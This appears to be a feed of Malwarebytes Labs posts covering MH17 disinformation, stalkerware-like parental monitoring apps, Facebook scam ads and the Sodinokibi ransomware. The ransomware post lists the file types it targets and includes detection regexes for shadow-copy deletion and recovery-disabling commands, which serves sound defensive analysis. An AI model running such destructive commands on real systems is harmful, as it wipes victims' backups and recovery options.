Techie Feeds

Malaysia Airlines Flight 17 investigation shows Russian disinformation campaigns have global reach

Malwarebytes - Tue, 07/23/2019 - 15:54

A little background: on July 17, 2014, Malaysia Airlines Flight 17 was shot down over eastern Ukraine on its way from Amsterdam to Kuala Lumpur. The plane was hit by a surface-to-air missile, and all 298 people on board were killed.

At the time, pro-Russian militants were in open revolt against the Ukrainian government. Both the Ukrainian military and the separatists denied responsibility for the incident. After investigation of the crash site and reconstruction of the plane wreckage, it was determined that the missile had been fired from a BUK air defense missile system.

BUK systems originated in the former Soviet Union but are in use by several countries. Three military forces in the region possessed the type of weaponry identified as the cause of the damage: the Ukrainian military, the separatists, and the Russian forces present in the region as “advisors” to the separatists. For this reason, it was difficult to establish who was responsible for the attack.

Here’s where cybersecurity comes into play. Social media and leaked data played an important role in this investigation. And they also play an important role in the propaganda that the Russians used, and are continuing to use, to invalidate the methods and results of the investigation.

By following the cybersecurity breadcrumbs, we can determine which information released online is legitimate and which is deliberate disinformation. However, most casual readers don’t go that far—or can’t—as they lack the technical means to validate information sources.

How can they (we) sort out fiction from fact? Here’s what we know about the investigation into MH17, Russian disinformation, and which countermeasures can be put in place to fight online propaganda.

The investigation

On June 19, 2019, the Joint Investigation Team (JIT) set up to investigate the incident issued warrants for four individuals it holds responsible: three Russian nationals and one Ukrainian national. They were not the crew of the BUK missile launcher, but the men believed to be behind the transport and deployment of the Russian BUK missile launcher.

The Netherlands had already held Russia responsible at an earlier stage of the investigation, having found sufficient evidence that the BUK launcher originated from Russia and was manned by Russian soldiers. Both Ukraine and Russia have laws against the extradition of their nationals, so the chances of hearing from the suspects are slim to none. So how can we learn exactly what happened?

Finding information

Immediately after the incident, the JIT began archiving 350 million web pages with information about the region where the incident took place. These pages were saved because important information could otherwise be lost or removed. By using photos and videos posted on social media, investigators were able to trace the route the BUK system took to reach the place from which the fatal missile was launched.

Dashcams are immensely popular in Russia and surrounding countries because they provide evidence in insurance claims, so there was a lot of material to work with. The multitude of independent sources also made the conclusions hard to contradict. Part of the route could even be confirmed using satellite images made by DigitalGlobe for Google Earth.

Using VKontakte (a Russian social media platform much like Facebook), a Bellingcat researcher was able to reconstruct the crew that manned the BUK system at the time of the incident. And the Ukrainian security service (SBU) gladly provided wiretaps of pro-Russian separatists “ordering” a BUK system and coordinating its transport into Ukraine. Bellingcat was even able to retrieve a traffic violation record confirming the location of one of the vehicles accompanying the BUK system.

Because Bellingcat is a private organization, it has fewer rules and regulations to follow than the official investigation team (JIT), which gives it an edge when it comes to using certain sources of information. If you are interested in the information they found, and especially how they found it, you really should read their full report.

If nothing else, it shows how a determined group of people can use all the little pieces of information you leave behind online to draw a pretty comprehensive picture. In fact, researchers have reason to believe that Bellingcat stirred up enough dirt to become the target of a spear-phishing attack attributed to the Russian APT group Fancy Bear.

These attacks are suspected to have been attempts to take over Bellingcat accounts enabling the Russians to create even more confusion. The Dutch team that investigated the incident scene reported phishing and hacking attempts as well.

Creating disinformation

Russia has a dedicated disinformation outfit called the Internet Research Agency (IRA), headquartered in St. Petersburg. It started an orchestrated campaign to pin the blame for the incident on the Ukrainian military.

While the IRA would love to influence international opinion about what happened to MH17, there’s far too much information (read: facts) out there that would prove them wrong. Instead, they are focusing on their domestic audience to influence the country’s own public opinion. Knowing that their government shot down a commercial airliner would not go down well. So blogs were written blaming the Ukrainian military, and many thousands of fake accounts started pointing to those blogs. In the first two days after the disaster alone, this amounted to 66,000 Tweets.

Every time the JIT issued new information about their findings, the IRA started a new campaign with “alternative” information. This prolonged campaign and the sheer mass of disinformation did have one advantage. The platforms that the IRA used were able to gather a lot of information about the operation and link the social media accounts that were involved.

In 2018, Twitter issued an update mentioning the IRA as they removed almost 4,000 Russian accounts believed to be associated with the group, which amassed:

10 million Tweets and 2 million images, GIFs, videos, and Periscope broadcasts

Twitter certainly wasn’t the only platform the IRA used to spread disinformation, but it’s the only platform that disclosed its information about the “fake news factory.” You can find the same disinformation posted on Facebook, VKontakte, and in the comments sections of many websites.

Their goal is simple: when the public reads 20 different stories about the same news item, they no longer know which one to believe. One interesting version promoted by the IRA held that the BUK missile must have been intended for a plane carrying Russian president Putin, which had supposedly passed through the area shortly before the incident. It’s easy to track down information proving this wasn’t true, but most readers won’t go that far.

Yet another conspiracy theory linked the Ukrainian military with Western governments. Russia has a long history of conspiracy theories that are used both to entertain the audience and to lead them away from reality.

Countermeasures against disinformation

Since 2016, the US has become aware of Russian interference in online information, communications, and even elections—but we haven’t found a surefire fix for fake news. Europe caught on a bit earlier, but the stakes remain high: in the hands of those intent on undermining democracies, a simple piece of disinformation can unravel hundreds of years of progress.

Before the United States figured out how to respond and while Europe was cautiously evaluating the online landscape, their adversaries were able to evolve and advance their disinformation techniques. Russia is not alone: there are other nations that would like to see democratic societies upended. Iran, North Korea, and China are learning from the Russians how to play the game of disinformation.

Obvious methods to counter the possible influence of disinformation are education, finding trusted sources, and transparency. But even in a democracy, these are not always the first resort for those in powerful positions.

Education empowers people to make up their own mind based on gathered information. Transparency gives them the tools to make decisions based on facts and not fiction. And finding trusted sources means first digging deep into their backgrounds, learning whether their methods of reporting are honorable, and establishing a consistent pattern of truth-telling.

You can ask yourself whether it is a good strategy to rely on the self-moderation that has been imposed on social media platforms, but at the moment this is our first line of defense. The US Congress has drafted legislation that would increase ad transparency, govern data use, and establish an interagency fusion cell to coordinate government responses to disinformation, but for now these bills are all waiting to be passed.

Unlimited research

Another question raised by this case is how we can bring the effectiveness of official investigators like the JIT up to the level of Bellingcat without giving them a free pass to hack their way into every imaginable system.

An official international “police force” might be needed to conduct investigations for the international courts that already are in place, with warrants to demand information from any source that might have it. However, this doesn’t work when suspects, such as those in the MH17 investigation, are protected from the law if they stay in their own country.

We know the courts and investigators should be provided with more adequate ways to gather evidence, but this is no easy matter to solve without jeopardizing the very free will we are trying to protect. It will require a lot of diplomacy and negotiation if we ever want to achieve this.

A little warning

Since interest in this incident has risen again after the official disclosure of some of the main suspects, we may see a revival of MH17-related phishing campaigns. Previous campaigns posed as memorial sites for the victims but led visitors to fake sites that coaxed them into allowing push notifications or downloading video players bundled with PUPs or malware.

Stay on the lookout, as cybercriminals—whether of Russian origin or not—are always looking to capitalize on tantalizing news stories or moments of public confusion.

And when in doubt, the best advice we can give is to be cautious when exploring the Internet and view any information you read through the lens of caution. Find your trusted sources, educate yourself, and look for those who are transparent.

Stay safe, everyone!

The post Malaysia Airlines Flight 17 investigation shows Russian disinformation campaigns have global reach appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 15 – 21)

Malwarebytes - Mon, 07/22/2019 - 15:50

Last week on Malwarebytes Labs, we took an extensive look at Sodinokibi, one of the new ransomware strains found in the wild that many believe picked up where GandCrab left off. We also profiled Extenbro, a Trojan that protects adware; reported on the UK’s new Facebook reporting tool; homed in on new Magecart strategies that render them “bulletproof”; identified challenges faced by the education sector in the age of cybersecurity; and looked at how older generations keep up with the fast-paced evolution of tech.

Other cybersecurity news:
  • An exploit called Media File Jacking gives hackers access to the personal media files of WhatsApp and Telegram users, allowing for the interception, misuse, or manipulation of files. (Source: Venture Beat)
  • Remember the Zoom webcam vulnerability? RingCentral and Zhumu, two other video conferencing software programs, are also affected by the same flaw. (Source: BuzzFeed News)
  • A bug in Instagram that allows someone to bypass 2FA to hack any account was made public. Facebook quickly fixed the issue. (Source: Threatpost)
  • Sodinokibi isn’t the only ransomware borne from older ransomware. DoppelPaymer emerged from BitPaymer, too. (Source: Bleeping Computer)
  • Schools continue to be vulnerable on the cybersecurity side. And while ransomware is their current big problem, DDoS attacks are the second. (Source: The Washington Post)
  • FaceApp has been in hot water these past few days due to its connection with Russia. The company broke its silence and denied storing users’ photographs without permission. (Source: The Guardian)
  • EvilGnome, a new backdoor, was found to target and spy on Linux users. (Source: Bleeping Computer)
  • To prove a point, researchers made an Android app that targets insulin pumps, either to withhold or give lethal dosages of insulin, threatening patient lives. (Source: WIRED)
  • Some browser extensions were found to have collected the browsing histories of millions of users. This gigantic leak is dubbed DataSpii, and both Chrome and Firefox users are affected. (Source: Ars Technica)
  • Meet Ke3chang, an APT group that is out to get diplomatic missions. (Source: ESET’s We Live Security Blog)

Stay safe, everyone!

The post A week in security (July 15 – 21) appeared first on Malwarebytes Labs.


Parental monitoring apps: How do they differ from stalkerware?

Malwarebytes - Mon, 07/22/2019 - 15:00

In late June, Malwarebytes revived its long-running campaign against a vicious type of malware in use today. This malware peers into text messages. It pinpoints victims’ movements across locations. It reveals browsing and search history. Often hidden from users, it strips away their expectation of, and right to, privacy, both online and in the real world.

But after we recommitted our staunch opposition to this type of malware—called stalkerware—we received questions about something else: Parental monitoring apps.

The capabilities of the two often overlap.

TeenSafe, which retooled its product to focus on safe driving, previously let parents read their children’s text messages. Qustodio, recommended by the Wirecutter for parents who want to limit their children’s device usage, lets parents track their kids’ locations. Kidguard, clearly named and advertised as a child safety app, lets parents view their children’s browsing and search history.

Quickly, the line becomes blurred. What are the differences between stalkerware apps and parental monitoring apps? What is an “acceptable” or “safe” parental monitoring app? And how can a parent know whether they’re downloading a “legitimate” parental monitoring app instead of a stalkerware app merely disguised as a tool for parents?

Malwarebytes Labs is not here to tell people how to parent their children. We are here to investigate, report, and inform.

Knowing what we do about parental monitoring apps—their capabilities, their cybersecurity vulnerabilities, and their privacy implications—our safest recommendation is to avoid these apps.

However, we understand the digital challenges facing parents today. Cyberbullying remains a constant concern, violent images and videos proliferate online, and extremist content lingers across multiple platforms.

Diana Freed, a PhD student at the Intimate Partner Violence tech research lab led by Cornell Tech faculty, said she understands the appeal of these tools for parents. They advertise safety, she said.

“I believe that when parents are putting these apps on someone’s phone, they’re trying to do it to make their child safer,” Freed said. “They’re not saying ‘I don’t want my child to not have privacy.’ They think they’re doing the best they can to make this a safer place for their child.”

However, Freed explained, there is a lot to these apps that parents should know.

“Let’s assume that everyone is a good actor and wants to do the right thing,” Freed said. “But it is a matter of, is it clear to that parent what these apps are doing?”

What’s the difference?

Multiple privacy advocates and cybersecurity researchers said that, when comparing the technical capabilities of parental monitoring apps to those of stalkerware apps, the light that shines between the two is dim, if not entirely absent.

“Is there a line between legitimate monitoring apps and stalkerware apps?” said Cynthia Khoo, co-author of “Predator in Your Pocket,” the Citizen Lab report on stalkerware.

She answered her own question:

“On a technological level, no. There is no differentiation.”

Khoo explained that, when working with her co-authors on the Predator in Your Pocket paper, the team initially struggled with how to address monitoring applications that advertise themselves in benign, non-predatory ways, yet provide users with reams of sensitive information. It is the famous “dual-use” problem with stalkerware: some apps, though not advertised or designed for invasive monitoring, still provide the same capabilities.

That struggle disappeared, though, Khoo said, when the team realized that apps could be evaluated by their capabilities, and by whether those capabilities could violate the laws of Canada, where Citizen Lab is located.

“We realized that if an app is not just providing location monitoring, if it’s collecting information from social media accounts, the private contents of someone’s phone—in Canadian law, that could be seen as unlawful interception of someone’s phone, unauthorized access to someone’s computer,” Khoo said. “Regardless of branding or marketing, that’s a criminal offense.”

Emory Roane, policy counsel at Privacy Rights Clearinghouse, said that not only are the technical capabilities of stalkerware apps and parental monitoring apps highly similar, but those same capabilities can be found in the hacking tools used by nation states.

“If you look at the capabilities: What results can be gathered from devices implanted with stalkerware versus devices hacked by nation states? It’s the same,” Roane said. “Turning on and off the device remotely, key loggers, tracking via GPS, all of this stuff.”

Roane continued: “We have to be very careful about the use of these by parents.”

Both Roane and Khoo also warned about the lack of consent allowed by many of these apps. Some stalkerware apps, like mSpy, FlexiSPY, and Hoverwatch, can operate entirely hidden from view, absent from a device’s app drawer.

Some parental monitoring apps offer the exact same feature.

Particularly concerning, we found that the app Kidguard actually reviewed the stalkerware app mSpy on its own website. In the list of pros and cons for mSpy, Kidguard listed the following as a positive:

“Operates 100% invisibly, cannot be detected.”

This invisible capability is a clear warning sign about any monitoring app, Khoo said.

“There is no legitimate reason or need to hide surveillance if it is truly for a genuine, good faith, legal, legitimate purpose,” Khoo said. “If you have the person’s consent, you don’t need to hide. If you don’t have consent, this shouldn’t be used in the first place.”

We agree.

Any monitoring app designed to hide itself from the end-user is designed against consent.

The cybersecurity risks

The cybersecurity reputations of several parental monitoring apps are questionable, as the companies behind them have left data—including photos and videos of children—vulnerable to threat actors and hackers.

In 2017, Cisco researchers disclosed multiple vulnerabilities for the network device “Circle with Disney,” a tool meant to monitor a child’s Internet usage. The researchers found that Circle with Disney had vulnerabilities that could have let a hacker “gain various levels of access and privilege, including the ability to alter network traffic, execute arbitrary remote code, inject commands, install unsigned firmware, accept a different certificate than intended, bypass authentication, escalate privileges, reboot the device, install a persistent backdoor, overwrite files, or even completely brick the device.”

In 2018, a UK-based cybersecurity researcher found two unsecured cloud servers operated by TeenSafe. Located on the servers were tens of thousands of account records, including parents’ email addresses and children’s Apple ID email addresses, along with their device names, unique identifiers, and plaintext passwords.

ZDNet, which covered the vulnerability, wrote:

“Because the app requires that two-factor authentication is turned off, a malicious actor viewing this data only needs to use the credentials to break into the child’s account to access their personal content data.”
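Storing plaintext passwords, as TeenSafe's servers reportedly did, is exactly the failure that salted password hashing prevents: even if the database leaks, the original passwords cannot simply be read off. A minimal illustrative sketch using only Python's standard library (the function names are our own, not TeenSafe's or any vendor's):

```python
import hashlib
import hmac
import os

def hash_password(password: str, *, iterations: int = 200_000) -> str:
    # A random per-user salt ensures identical passwords produce different hashes.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # Store the algorithm, iteration count, salt, and digest together.
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_password(password: str, stored: str) -> bool:
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    # Constant-time comparison avoids leaking information via timing.
    return hmac.compare_digest(digest.hex(), digest_hex)
```

With a scheme like this, a server compromise exposes only salted hashes; the plaintext credential never needs to be stored at all.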

Also in 2018, the parental monitoring company Family Orbit—which offers an app on iOS and Android—left open cloud storage servers that contained an eye-popping 281 gigabytes of sensitive data. The vulnerable servers, identified by an online hacker, contained photographs and videos of children.

These are just the cybersecurity flaws. That’s to say nothing of the labyrinthine network of third parties that may work with parental monitoring apps, receiving collected data and storing it on other, potentially insecure servers littered across the web.

Steadily, the American public has begun to understand and push back on the many ways in which their data is shared with numerous third parties, often without their express, individualized consent. If it isn’t okay for adults, is it okay for children?

The privacy risks

Parental monitoring apps can give parents a near-omniscient, unfiltered view into their children’s lives, granting them access to text messages, shared photos, web browsing activity, locations visited, and call logs. Without getting consent from a child, these surveillance capabilities represent serious invasions of privacy.

Privacy Rights Clearinghouse’s Roane compared the clandestine use of these apps to a more familiar analogue:

“Would you support breaking into your child’s diary if this was the ’80s?” Roane said. “This is extremely sensitive information.”

Multiple studies have suggested that the relationship between parents and children can be significantly altered depending on the types of surveillance pushed onto them, with the age of a child playing a significant role. As a child grows older—and as their need for privacy ties closely into their autonomy—digital monitoring can potentially hinder their trust in their parents, their self-expression, and their mental health.

A few years ago, UNICEF published a discussion paper that warned of this very problem:

“The tension between parental controls and children’s right to privacy can best be viewed through the lens of children’s evolving capacities. While parental controls may be appropriate for young children who are less able to direct and moderate their behaviour online, such controls are more difficult to justify for adolescents wishing to explore issues like sexuality, politics, and religion.”

The paper also warned that strict parental controls could impair a child’s ability to “seek outside help or advice with problems at home.”

According to the science magazine Nautilus, a one-year study of junior high students in the Netherlands showed that students who were snooped on by their parents reported “more secretive behaviors, and their parents reported knowing less about the child’s activities, friends, and whereabouts, compared to other parents.”

Laurence Steinberg, a professor of psychology at Temple University, told Nautilus that when parents invade their children’s privacy, those children could be more at risk of suffering from depression, anxiety, and withdrawal. He told the outlet:

“There’s a lot of research indicating that kids who grow up with overly intrusive parents are more susceptible to those mental health problems, partly because they undermine the child’s confidence in their abilities to function independently.”

Further, in the 2012 report, “Surveillance Technologies and Children,” the Office of the Privacy Commissioner of Canada suggested that parents who rely on surveillance to keep their children safe risk stunting the maturity of those children.

Tonya Rooney, a researcher in child development and relationships at the Australian Catholic University, said in the report:  

“We need to question whether the technologies may be depriving children of the opportunity to develop confidence and competence in skills that would in turn leave them in a stronger position to assess and manage risks across a broad range of life experiences.” 

Unfortunately, this field of study is relatively new. As the children subject to parental monitoring apps reach adulthood, more can be measured, including whether those children will accept other forms of surveillance—like from domestic partners and governments.

If you’re looking for a pithy takeaway, maybe read Gizmodo’s article about a University of Central Florida study of teen monitoring apps: “Teen Monitoring Apps Don’t Work and Just Make Teens Hate Their Parents, Study Finds.”

Tough, necessary conversations

We understand that telling readers about the never-ending downsides of parental monitoring apps fails to address the likely reality that many parents have engaged in some type of digital monitoring in a safe, healthy, and openly-communicated way.

For those who have found safe passage, well done. For those who have not, the researchers we spoke to all agreed on one priority: If you absolutely insist on using one of these apps, you should discuss it with your children.

“You can openly say [to a child] ‘I am going to start looking at your location because we’re concerned and this is how we’re going to do it,’” said Freed of the IPV tech lab at Cornell. “In terms of the child’s privacy, have a conversation on the concerns and why you’re doing it, what the app you’re putting on their phone will do, what information you’ll know.”

Freed continued:

“Work through it together.”

Freed also suggested that parents could introduce only one type of digital monitoring at a time. For each additional capability—location tracking, social media monitoring, browser activity monitoring—Freed said parents should have a new conversation.

Parents that are curious about a parental monitoring app’s capabilities—including whether that app could violate privacy—should read the description available online through the App Store or the Google Play Store, said Sam Havron, another researcher and PhD student at the IPV tech lab.

“The best thing, or the closest thing, is to look at the developers’ descriptions on the marketplaces, look at the permission levels,” Havron said. He said parents could also download the app and try it out on a separate device before utilizing it on a child’s device.

Ellen Zavian, the parent of a 13-year-old boy and a member of the Tech and Safety Subcommittee for the Montgomery County Council of Parent-Teacher Associations in Maryland, suggested that parents look at the issue differently: Don’t focus so much on device software, focus on the device.

Instead of installing a screen-time-limiting app on a child’s device, or limiting what they see, or what apps they can use, remove the device entirely from the child’s room and don’t let them use it at night when they go to bed, Zavian said. Or maybe don’t let them own a device at all, which Zavian is pledging to do until her son starts eighth grade—a popular movement with parents called Wait Until 8th.

She also suggested only giving a child a Wi-Fi enabled device with no data plan, and then unplugging the home router to stop any Internet activity. Or parents could even prevent a child’s device from connecting to the home Internet, a setup that can be configured on most modern routers.
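On a Linux-based router, for example, that kind of per-device block can be expressed as a firewall rule keyed to the device's MAC address. This is a sketch only, assuming root access to such a router; the MAC address below is a placeholder, and most consumer routers expose the same idea through their "access control" or "parental control" settings:

```shell
# Block all forwarded (Internet-bound) traffic from the child's device,
# identified by its MAC address, without touching other devices.
iptables -A FORWARD -m mac --mac-source AA:BB:CC:DD:EE:FF -j DROP

# Delete the same rule to restore the device's access.
iptables -D FORWARD -m mac --mac-source AA:BB:CC:DD:EE:FF -j DROP
```

Unlike a monitoring app, a rule like this controls access without collecting any data about what the child does online.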

Zavian pressed on her point, making a comparison to another stressful moment in parenting—letting teenagers drive. She said there’s a difference between monitoring a teenager’s driving through apps and monitoring the teenager’s access to the car itself.

“When my friends were monitoring their kids with where they were driving to, my kids just wouldn’t have keys to the car,” Zavian said. “Why do you want to engage in that fight—you’ve got enough fights when they’re teenagers—where you say ‘I saw you went here,’ or ‘I saw you were speeding here.’”

Zavian suggested that parents remember there are always alternatives to using a parental monitoring app. In fact, those alternatives have existed far longer; she encountered them herself when she was learning to drive.

“Just like we did—you get into a car accident, you’re off the insurance,” Zavian said.

The post Parental monitoring apps: How do they differ from stalkerware? appeared first on Malwarebytes Labs.


New Facebook ad reporting tool launches in UK

Malwarebytes - Fri, 07/19/2019 - 15:00

Last year, well-known consumer advice expert Martin Lewis decided to take Facebook to court for defamation. The cause? Multiple bogus adverts placed on the social network featuring his likeness, appearing via the ad network Outbrain.

Because Lewis is a trusted face in consumer causes, scammers bolting his likeness onto rogue ads were always going to be a money spinner. This had the knock-on effect of potentially damaging his reputation, especially with tales of victims losing as much as £100,000.

By the time he’d seen around 50 advertisements promoting various Bitcoin scams, enough was enough—especially as he felt reporting the ads got him nowhere.

Making bogus ads for fun and profit

Regular readers will no doubt be familiar with these types of bogus ads hawking swiped images of trusted individuals. It’s essentially the same scam we saw a while back on compromised profile pages, all promoting some wonderful new money-making scheme courtesy of Ellen. However you stack it up, people end up out of pocket.

In Lewis’ case, some of the ads looked like they were from British newspapers or other established news sources. Many offered the usual social engineering tactic of a ticking timer: “Get this offer soon before it runs out!” Work-from-home riches, revolutionary opportunities, huge returns on “small” investments: every sleazy claim you could imagine was present and accounted for, and all of them sat next to or above Lewis looking enthusiastic (and talking about something utterly unrelated).

Facebook banned crypto-themed ads, but these Lewis-themed efforts simply replaced pictures of Bitcoin with pictures of him and sent them to cryptocurrency sites elsewhere. The Lewis ads in question were centered on incredibly dubious binary trading scams.

What is binary trading?

It’s a risky form of fixed-odds betting: you either win or you lose. Win, and you get a bump in your coffers. Lose, and you lose everything. Binary options are not allowed in the EU, which means scammers set up shop outside its borders, claim to have bases of operations in places like London and Paris, and set to work with slick, convincing adverts. As the FCA’s advice notes, some scammers will even manipulate the numbers in front of potential victims before swiping all the cash and vanishing into the night.

It was into this maelstrom of potentially damaged reputations, bogus adverts, and devastating fake Bitcoin scams that Lewis and Facebook went to battle. After what he felt was a year-long lack of responsiveness, off he went to court to try to get something done about it.

Closing time for bad ads?

In January 2019, Lewis agreed to settle out of court. By this point, Facebook had admitted there had been “thousands” of these ads across the site. The settlement rested on two conditions: Facebook would donate £3 million to Citizens Advice to create a UK Scams Action Project, and it would launch a UK-centric scam ad reporting tool complete with a dedicated team. The donation would take the form of £2.5 million in cash over two years, with the other £500,000 covering Facebook ads, presumably promoting the new services.

We have lift-off

A little later than previously advertised, the wheels have finally turned and the promises listed above have become tangible reality. Not only is the Scams Action page live, but the rogue ad report tool is also active in the UK. Reporting an ad takes a few steps, but is clearly an improvement on no tool at all: click the dots above any ad and select the appropriate options before sending the report.


There’s never been a better time to start reporting bogus ads on Facebook. If you see something that looks suspicious, by all means file a report and do your bit to help keep the most vulnerable online away from potentially life-ruining scams.

The post New Facebook ad reporting tool launches in UK appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void

Malwarebytes - Thu, 07/18/2019 - 17:58

Sodinokibi ransomware, also known as Sodin and REvil, is hardly three months old, yet it has quickly become a topic of discussion among cybersecurity professionals because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.

Detected by Malwarebytes as Ransom.Sodinokibi, Sodinokibi is a ransomware-as-a-service (RaaS), just as GandCrab was, though researchers believe it to be more advanced than its predecessor. We’ve watched this threat target businesses and consumers equally since the beginning of May, with a spike for businesses at the start of June and elevated consumer detections in both mid-June and mid-July. Based on our telemetry, Sodinokibi has been on the rise since GandCrab’s exit at the end of May.

Business and consumer detection trends for Sodin/REvil from May 2019 until present

On May 31, the threat actors behind GandCrab formally announced their retirement, detailing their plan to cease selling and advertising GandCrab in a dark web forum post.

“We are leaving for a well-deserved retirement,” a GandCrab RaaS administrator announced. (Courtesy of security researcher Damian on Twitter)

While many may have heaved sighs of relief at GandCrab’s “passing,” some expressed skepticism over whether the team would truly put its successful money-making scheme behind it. What followed was bleak anticipation of another ransomware operation—or a re-emergence of the group peddling new wares—taking over to fill the hole GandCrab left behind.

Enter Sodinokibi

Putting a spin on an old product is not unheard of in legitimate business circles. Often, spinning involves creating a new name for the product, tweaking some of its existing features, and finding new influencers—”affiliates” in the case of RaaS operations—to use (and market) the product. In addition, threat actors would initially limit the new product’s availability and follow with a brand-new marketing campaign—all without touching the underlying product. In hindsight, it seems the GandCrab team has taken this route.

A month before the GandCrab retirement announcement, Cisco Talos researchers released information about their discovery of Sodinokibi. Attackers manually infected the target server after exploiting a zero-day vulnerability in its Oracle WebLogic application.

To date, six versions of Sodinokibi have been seen in the wild.

Sodinokibi versions, from the earliest (v1.0a), which was discovered on April 23, to the latest (v1.3), which was discovered July 8

Sodinokibi infection vectors

Like GandCrab, the Sodinokibi ransomware follows an affiliate revenue system, which allows other cybercriminals to spread it through several vectors. Their attack methods include:

  • Active exploitation of a vulnerability in Oracle WebLogic, officially named CVE-2019-2725
  • Malicious spam or phishing campaigns with links or attachments
  • Malvertising campaigns that lead to the RIG exploit kit, an avenue that GandCrab used before
  • Compromised or infiltrated managed service providers (MSPs), which are third-party companies that remotely manage the IT infrastructure and/or end-user systems of other companies, to push the ransomware en masse. This is done by accessing networks via the remote desktop protocol (RDP) and then using the MSP console to deploy the ransomware.

Although affiliates used these tactics to push GandCrab, too, many cybercriminals—nation-state actors included—have done the same to push their own malware campaigns.

Symptoms of Sodinokibi infection

Systems infected with Sodinokibi ransomware show the following symptoms:

Changed desktop wallpaper. Like any other ransomware, Sodinokibi changes the desktop wallpaper of affected systems into a notice, informing users that their files have been encrypted. The wallpaper has a blue background, as you can partially see from the screenshot above, with the text:

All of your files are encrypted!
Find {5-8 alpha-numeric characters}-readme.txt and follow instructions

Presence of ransomware note. The {5-8 alpha-numeric characters}-readme.txt file it’s referring to is the ransom note that comes with every ransomware attack. In Sodinokibi’s case, it looks like this:

The note contains instructions on how affected users can go about paying the ransom and how the decryption process works.

Screenshot of the TOR-only accessible website Sodinokibi victims were told to visit to make their payments

Encrypted files with a 5–8 character extension name. Sodinokibi encrypts certain files on local drives with the Salsa20 encryption algorithm, with each file renamed to include a pre-generated, pseudo-random alpha-numeric extension that’s five to eight characters long.

The extension name and character string included in the ransom note file name are the same. For example, if Sodinokibi has encrypted an image file and renamed it to paris2017.r4nd01, its corresponding ransom note will have the file name r4nd01-readme.txt.
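The naming relationship described above can be sketched in a few lines. The generation scheme below is a simplification for illustration; it is not the malware's actual algorithm:

```python
import random
import string

def random_extension(rng=random):
    """Generate a pseudo-random 5-8 character alpha-numeric extension,
    mimicking the pattern seen in Sodinokibi-encrypted file names.
    (Illustrative only -- not the malware's real derivation.)"""
    length = rng.randint(5, 8)
    alphabet = string.ascii_lowercase + string.digits
    return "".join(rng.choice(alphabet) for _ in range(length))

def renamed_file_and_note(filename, ext):
    """An encrypted file gains the extension; the ransom note's file
    name reuses the same character string."""
    return f"{filename}.{ext}", f"{ext}-readme.txt"

encrypted, note = renamed_file_and_note("paris2017", "r4nd01")
print(encrypted, note)  # -> paris2017.r4nd01 r4nd01-readme.txt
```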

Sodinokibi looks for files that are mostly media- and programming-related, with the following extensions to encrypt:

  • .jpg
  • .jpeg
  • .raw
  • .tif
  • .png
  • .bmp
  • .3dm
  • .max
  • .accdb
  • .db
  • .mdb
  • .dwg
  • .dxf
  • .cpp
  • .cs
  • .h
  • .php
  • .asp
  • .rb
  • .java
  • .aaf
  • .aep
  • .aepx
  • .plb
  • .prel
  • .aet
  • .ppj
  • .gif
  • .psd

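A minimal sketch of how such an extension filter might work. The set below mirrors the list above; the malware's real selection logic is not reproduced here:

```python
from pathlib import Path

# Subset of extensions from the list above; the malware's actual
# internal list may differ.
TARGETED_EXTENSIONS = {
    ".jpg", ".jpeg", ".raw", ".tif", ".png", ".bmp", ".3dm", ".max",
    ".accdb", ".db", ".mdb", ".dwg", ".dxf", ".cpp", ".cs", ".h",
    ".php", ".asp", ".rb", ".java", ".aaf", ".aep", ".aepx", ".plb",
    ".prel", ".aet", ".ppj", ".gif", ".psd",
}

def is_targeted(path):
    """Return True if the file's extension is on the target list."""
    return Path(path).suffix.lower() in TARGETED_EXTENSIONS

print(is_targeted("C:/Users/alice/Pictures/paris2017.jpg"))  # -> True
print(is_targeted("C:/Windows/system32/kernel32.dll"))       # -> False
```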
Deleted shadow copy backups and disabled Windows Startup Repair tool. Shadow copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) and Startup Repair are technologies inherent in the Windows OS. The former is “a snapshot of a volume that duplicates all of the data that is held on that volume at one well-defined instant in time,” according to Windows Dev Center. The latter is a recovery tool used to troubleshoot certain Windows problems.

Deleting shadow copies prevents users from restoring from backup when they find their files are encrypted by ransomware. Disabling the Startup Repair tool prevents users from attempting to fix system errors that may have been caused by a ransomware infection.
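Ransomware families commonly accomplish this with built-in Windows utilities such as vssadmin and bcdedit. The command-line patterns below are typical examples observed across many families—not confirmed as Sodinokibi's verbatim commands—and show how a defender might flag them in process-creation logs:

```python
import re

# Command-line patterns commonly associated with shadow-copy deletion
# and recovery tampering across many ransomware families (illustrative;
# not confirmed as Sodinokibi's exact commands).
SUSPICIOUS_PATTERNS = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.IGNORECASE),
    re.compile(r"bcdedit(\.exe)?\s+/set\s+\S+\s+recoveryenabled\s+no", re.IGNORECASE),
]

def flag_command_line(cmdline):
    """Return True if a logged command line matches a known-bad pattern."""
    return any(p.search(cmdline) for p in SUSPICIOUS_PATTERNS)

print(flag_command_line("vssadmin.exe Delete Shadows /All /Quiet"))  # -> True
print(flag_command_line("vssadmin list shadows"))                    # -> False
```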

Other tricks up Sodinokibi’s sleeve

Ransomware doesn’t normally take advantage of zero-day vulnerabilities in its attacks—but Sodinokibi is not your average ransomware. It takes advantage of a privilege escalation zero-day vulnerability in the Win32k component of Windows.

Designated as CVE-2018-8453, this flaw can grant Sodinokibi administrator access to the endpoints it infects. This means that it can conduct the same tasks as administrators on systems, such as disabling security software and other features that were meant to protect the system from malware.

CVE-2018-8453 was the same vulnerability that the FruityArmor APT exploited in its malware campaign last year.

New variants of Sodinokibi have also been found to use “Heaven’s Gate,” an old evasion technique used to execute 64-bit code on a 32-bit process, which allows malware to run without getting detected. We touched on this technique in early 2018 when we dissected an interesting cryptominer we captured in the wild.

Protect your system from Sodinokibi

Malwarebytes tracks Sodinokibi campaigns and protects premium consumer users and business users with signature-less detection, nipping the attack in the bud before the infection chain even begins. Users of our free version, which lacks real-time protection, are not proactively protected from this threat.

We recommend consumers take the following actions if they are not premium Malwarebytes customers:

